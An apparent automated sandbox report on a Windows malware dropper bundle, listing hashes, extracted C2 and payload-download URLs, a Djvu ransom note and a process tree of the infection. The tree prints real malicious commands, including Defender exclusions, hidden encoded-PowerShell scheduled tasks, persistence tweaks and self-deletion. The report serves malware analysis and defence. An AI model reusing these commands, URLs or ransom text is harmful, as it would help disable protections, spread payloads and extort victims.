Resubmissions

14-11-2022 04:15

221114-evjrnshh2t 10

17-07-2022 06:05

220717-gtf1hagcf3 10

02-07-2022 06:53

220702-hn2kpadhcp 10

Analysis

  • max time kernel
    197s
  • max time network
    679s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    02-07-2022 06:53

General

  • Target

    File.exe

  • Size

    275KB

  • MD5

    bdc781f3ff4937a9f53d0af613d00002

  • SHA1

    0e1a3279035daa3d0681fd24e2a7c1d446882054

  • SHA256

    bbf8dbb3ca59a60f20438cabbb16449bdecbfa4c6347172a6e20c3639dd4e2fd

  • SHA512

    c7311fc23ca7d6552dcf759aed5bd000df04ac78d672d6cab2ee7976301714a96773dda7c0b76e6abc26f4852318a02218e549cd1e392fbbd59bf56a5e28e145

Malware Config

Extracted

Family

privateloader

C2

http://212.193.30.45/proxies.txt

http://85.202.169.116/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

85.202.169.116

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

http://212.193.30.29/server.txt

212.193.30.21

Attributes
  • payload_url

    http://193.233.185.125/download/NiceProcessX64.bmp

    http://193.233.185.125/download/NiceProcessX32.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://193.56.146.76/Proxytest.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

    http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

    https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

    http://185.215.113.208/ferrari.exe

    https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://mnbuiy.pw/adsli/note8876.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

    http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

    https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

nymaim

C2

45.141.237.3

31.210.20.149

212.192.241.16

Extracted

Family

djvu

C2

http://acacaca.org/test3/get.php

Attributes
  • extension

    .eiur

  • offline_id

    JPKXWc5eWNjIicWmQyJxv6NCjbH02qrKi0af9Zt1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://acacaca.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-aMsnHoiJcO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0510Usjdjs

rsa_pubkey.plain

Extracted

Family

vidar

Version

53

Botnet

1448

C2

https://t.me/ch_inagroup

https://mastodon.social/@olegf9844e

Attributes
  • profile_id

    1448

Extracted

Family

redline

Botnet

Mount2

C2

ushatamaiet.xyz:80

adinoreiver.xyz:80

qulyneanica.com:80

Attributes
  • auth_value

    041a7c36d4c8d195af1a8b950182ee96

Extracted

Family

vidar

Version

53

Botnet

937

C2

https://t.me/ch_inagroup

https://mastodon.social/@olegf9844e

Attributes
  • profile_id

    937

Extracted

Family

vidar

Version

52.7

Botnet

517

C2

https://t.me/tg_superch

https://climatejustice.social/@olegf9844

Attributes
  • profile_id

    517

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 10 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 9 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs
  • NyMaim

    NyMaim is a malware with various capabilities written in C++ and first seen in 2013.

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

    suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

  • suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

    suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

  • suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

    suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

  • suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

    suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

    suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

  • Vidar Stealer 9 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 55 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 16 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 55 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 34 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\File.exe
    "C:\Users\Admin\AppData\Local\Temp\File.exe"
    1⤵
    • DcRat
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Users\Admin\Pictures\Adobe Films\ddD4e2ycv3SboVSm9XdEuAPz.exe
      "C:\Users\Admin\Pictures\Adobe Films\ddD4e2ycv3SboVSm9XdEuAPz.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      PID:780
      • C:\Windows\SysWOW64\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" rXmW34KJ.LRS -S
        3⤵
        • Loads dropped DLL
        PID:4624
    • C:\Users\Admin\Pictures\Adobe Films\gMSCcxDhzNL6HxnMVXXqmJTm.exe
      "C:\Users\Admin\Pictures\Adobe Films\gMSCcxDhzNL6HxnMVXXqmJTm.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4892
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1304
        3⤵
        • Program crash
        PID:2236
    • C:\Users\Admin\Pictures\Adobe Films\rpR1tJFc_HKayyoOL1nqxoTf.exe
      "C:\Users\Admin\Pictures\Adobe Films\rpR1tJFc_HKayyoOL1nqxoTf.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:392
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 1296
        3⤵
        • Program crash
        PID:4248
    • C:\Users\Admin\Pictures\Adobe Films\WTuOmkgS9p7OFBa2ffmGdvpd.exe
      "C:\Users\Admin\Pictures\Adobe Films\WTuOmkgS9p7OFBa2ffmGdvpd.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Drops file in Program Files directory
      PID:5088
      • C:\Users\Admin\Documents\e45FA1pVhoN9KLpoCUw0wmUg.exe
        "C:\Users\Admin\Documents\e45FA1pVhoN9KLpoCUw0wmUg.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Checks computer location settings
        PID:556
        • C:\Users\Admin\Pictures\Adobe Films\2lGlTeEtwGzBFxh1FiYVIJjp.exe
          "C:\Users\Admin\Pictures\Adobe Films\2lGlTeEtwGzBFxh1FiYVIJjp.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Modifies registry class
          PID:4996
          • C:\Windows\SysWOW64\control.exe
            "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\I6r04HRT.CPL",
            5⤵
              PID:5732
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\I6r04HRT.CPL",
                6⤵
                • Loads dropped DLL
                PID:5232
                • C:\Windows\system32\RunDll32.exe
                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\I6r04HRT.CPL",
                  7⤵
                    PID:5896
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\I6r04HRT.CPL",
                      8⤵
                      • Loads dropped DLL
                      PID:4560
            • C:\Users\Admin\Pictures\Adobe Films\1R4CefygFrnARhCHGX6nRh4m.exe
              "C:\Users\Admin\Pictures\Adobe Films\1R4CefygFrnARhCHGX6nRh4m.exe"
              4⤵
                PID:5372
                • C:\Users\Admin\Pictures\Adobe Films\1R4CefygFrnARhCHGX6nRh4m.exe
                  "C:\Users\Admin\Pictures\Adobe Films\1R4CefygFrnARhCHGX6nRh4m.exe" H
                  5⤵
                    PID:3560
                • C:\Users\Admin\Pictures\Adobe Films\bUx8Ck4YdIpnpqxIOlDAZmJ7.exe
                  "C:\Users\Admin\Pictures\Adobe Films\bUx8Ck4YdIpnpqxIOlDAZmJ7.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:896
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib -?
                    5⤵
                    • Views/modifies file attributes
                    PID:3992
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
                    5⤵
                      PID:5800
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd
                        6⤵
                          PID:3196
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist /FI "imagename eq PSUAService.exe"
                            7⤵
                            • Enumerates processes with tasklist
                            PID:232
                          • C:\Windows\SysWOW64\find.exe
                            find /I /N "psuaservice.exe"
                            7⤵
                              PID:5848
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
                              7⤵
                                PID:2960
                              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                Tal.exe.pif H
                                7⤵
                                • Executes dropped EXE
                                PID:3188
                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
                                  8⤵
                                    PID:5996
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping localhost -n 5
                                  7⤵
                                  • Runs ping.exe
                                  PID:5760
                              • C:\Windows\SysWOW64\PING.EXE
                                ping -n 5 localhost
                                6⤵
                                • Runs ping.exe
                                PID:4532
                          • C:\Users\Admin\Pictures\Adobe Films\tl2P_EnkKoIRM0HqSvxdk2wr.exe
                            "C:\Users\Admin\Pictures\Adobe Films\tl2P_EnkKoIRM0HqSvxdk2wr.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:60
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im "tl2P_EnkKoIRM0HqSvxdk2wr.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\tl2P_EnkKoIRM0HqSvxdk2wr.exe" & exit
                              5⤵
                                PID:5652
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im "tl2P_EnkKoIRM0HqSvxdk2wr.exe" /f
                                  6⤵
                                  • Kills process with taskkill
                                  PID:3436
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 1360
                                5⤵
                                • Program crash
                                PID:2024
                            • C:\Users\Admin\Pictures\Adobe Films\bmhAq0hcajELIhNjMHZkiAcz.exe
                              "C:\Users\Admin\Pictures\Adobe Films\bmhAq0hcajELIhNjMHZkiAcz.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:5108
                              • C:\Users\Admin\AppData\Local\Temp\7zSCEC5.tmp\Install.exe
                                .\Install.exe
                                5⤵
                                • Executes dropped EXE
                                PID:5612
                                • C:\Users\Admin\AppData\Local\Temp\7zSD433.tmp\Install.exe
                                  .\Install.exe /S /site_id "525403"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks computer location settings
                                  • Drops file in System32 directory
                                  • Enumerates system info in registry
                                  PID:5596
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                    7⤵
                                      PID:5744
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                        8⤵
                                          PID:5760
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                            9⤵
                                              PID:4748
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                              9⤵
                                                PID:3384
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                            7⤵
                                              PID:3128
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                8⤵
                                                  PID:4320
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                    9⤵
                                                      PID:3664
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                      9⤵
                                                        PID:4532
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "gzxiFBJTW" /SC once /ST 05:45:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                    7⤵
                                                    • DcRat
                                                    • Creates scheduled task(s)
                                                    PID:1596
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gzxiFBJTW"
                                                    7⤵
                                                      PID:5984
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "gzxiFBJTW"
                                                      7⤵
                                                        PID:4504
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:5984
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 08:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\yDetIJX.exe\" bH /site_id 525403 /S" /V1 /F
                                                          7⤵
                                                          • DcRat
                                                          • Drops file in Windows directory
                                                          • Creates scheduled task(s)
                                                          PID:5796
                                                  • C:\Users\Admin\Pictures\Adobe Films\0ayuVfZm90nsDXlH27gD56VO.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\0ayuVfZm90nsDXlH27gD56VO.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:4528
                                                  • C:\Users\Admin\Pictures\Adobe Films\GOTLQpLlIsdyDe4S9owceBHn.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\GOTLQpLlIsdyDe4S9owceBHn.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5432
                                                    • C:\Users\Admin\AppData\Local\Temp\is-D7RQ4.tmp\GOTLQpLlIsdyDe4S9owceBHn.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-D7RQ4.tmp\GOTLQpLlIsdyDe4S9owceBHn.tmp" /SL5="$70246,140559,56832,C:\Users\Admin\Pictures\Adobe Films\GOTLQpLlIsdyDe4S9owceBHn.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5940
                                                      • C:\Users\Admin\AppData\Local\Temp\is-6E88M.tmp\3alouch.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-6E88M.tmp\3alouch.exe" /S /UID=Irecch4
                                                        6⤵
                                                          PID:5728
                                                          • C:\Users\Admin\AppData\Local\Temp\0c-16694-4fa-3728b-28c57a1f20529\ZHaricalycy.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\0c-16694-4fa-3728b-28c57a1f20529\ZHaricalycy.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            PID:3384
                                                    • C:\Users\Admin\Pictures\Adobe Films\dRLlEJrfrNQ46LI8Zt0exfpg.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\dRLlEJrfrNQ46LI8Zt0exfpg.exe"
                                                      4⤵
                                                        PID:5896
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 5896 -s 696
                                                          5⤵
                                                          • Program crash
                                                          PID:2372
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                      3⤵
                                                      • DcRat
                                                      • Creates scheduled task(s)
                                                      PID:460
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                      3⤵
                                                      • DcRat
                                                      • Creates scheduled task(s)
                                                      PID:2004
                                                  • C:\Users\Admin\Pictures\Adobe Films\Co69YU3_Wi0ruwVUQzcMvRjV.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\Co69YU3_Wi0ruwVUQzcMvRjV.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4936
                                                    • C:\Users\Admin\Pictures\Adobe Films\Co69YU3_Wi0ruwVUQzcMvRjV.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\Co69YU3_Wi0ruwVUQzcMvRjV.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1888
                                                  • C:\Users\Admin\Pictures\Adobe Films\j7iYfyZBqpehjD5wqHnYaxLi.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\j7iYfyZBqpehjD5wqHnYaxLi.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    • Loads dropped DLL
                                                    • Checks processor information in registry
                                                    PID:2384
                                                    • C:\ProgramData\00617867642241074644.exe
                                                      "C:\ProgramData\00617867642241074644.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:1288
                                                      • C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        PID:608
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
                                                          5⤵
                                                            PID:732
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
                                                              6⤵
                                                                PID:5192
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
                                                              5⤵
                                                              • DcRat
                                                              • Creates scheduled task(s)
                                                              PID:1556
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main
                                                              5⤵
                                                                PID:2404
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 1228
                                                              4⤵
                                                              • Program crash
                                                              PID:3916
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im j7iYfyZBqpehjD5wqHnYaxLi.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\j7iYfyZBqpehjD5wqHnYaxLi.exe" & del C:\ProgramData\*.dll & exit
                                                            3⤵
                                                              PID:2556
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im j7iYfyZBqpehjD5wqHnYaxLi.exe /f
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:3144
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 6
                                                                4⤵
                                                                • Delays execution with timeout.exe
                                                                PID:2404
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1652
                                                              3⤵
                                                              • Program crash
                                                              PID:2512
                                                          • C:\Users\Admin\Pictures\Adobe Films\4Tcll0aLHixecbhfywWN_3hE.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\4Tcll0aLHixecbhfywWN_3hE.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks computer location settings
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:4884
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 4Tcll0aLHixecbhfywWN_3hE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4Tcll0aLHixecbhfywWN_3hE.exe" & del C:\ProgramData\*.dll & exit
                                                              3⤵
                                                                PID:5792
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im 4Tcll0aLHixecbhfywWN_3hE.exe /f
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  PID:5896
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 6
                                                                  4⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:6008
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 1788
                                                                3⤵
                                                                • Program crash
                                                                PID:896
                                                            • C:\Users\Admin\Pictures\Adobe Films\ZWGcYtRUGEhgsgAy6Z1gOtWJ.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\ZWGcYtRUGEhgsgAy6Z1gOtWJ.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:1608
